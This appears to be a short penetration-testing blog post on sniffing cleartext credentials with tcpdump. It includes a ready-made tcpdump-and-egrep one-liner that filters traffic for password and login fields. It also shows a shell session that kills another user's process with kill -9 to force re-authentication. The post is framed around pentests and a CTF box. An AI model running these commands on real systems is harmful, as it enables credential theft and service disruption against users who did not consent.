TCP Dump

tcpdump is a powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture.

Why do We Care?

Passive Eavesdropping. Low priv user escalation.

About Passive Eavesdropping

  • Kill process and make them re-auth
  • Listen for clear text credentials
  • Find new hosts and endpoints
  • Surveillance

Pentests

One of my favourite things to do on tests is to kill processes I know other users/admins are using that auth using protocols I can either downgrade or see in plaintext, this method is highly effective as the user will have to re-auth giving you the credentials you need. I can’t tell you how many times I have priv. esc’d with only tcpdump.

Example:

Here we sniff traffic as low-level user, open in Wireshark, follow TCP stream and voila, we have password 🙂

DC info and password masked as this example is taken from an active CTF style box.

Tactical Command

tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B5 -A5

One of my favourite things to do on tests is to kill processes I know other users/admins are using that auth using protocols I can either downgrade or see in plaintext, this method is highly effective as the user will have to re-auth giving you the credentials you need,

oracle@box#: ps
1392 process-to-kill
oracle@box#: kill -9 1392
oracle@box#: tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B5 -A5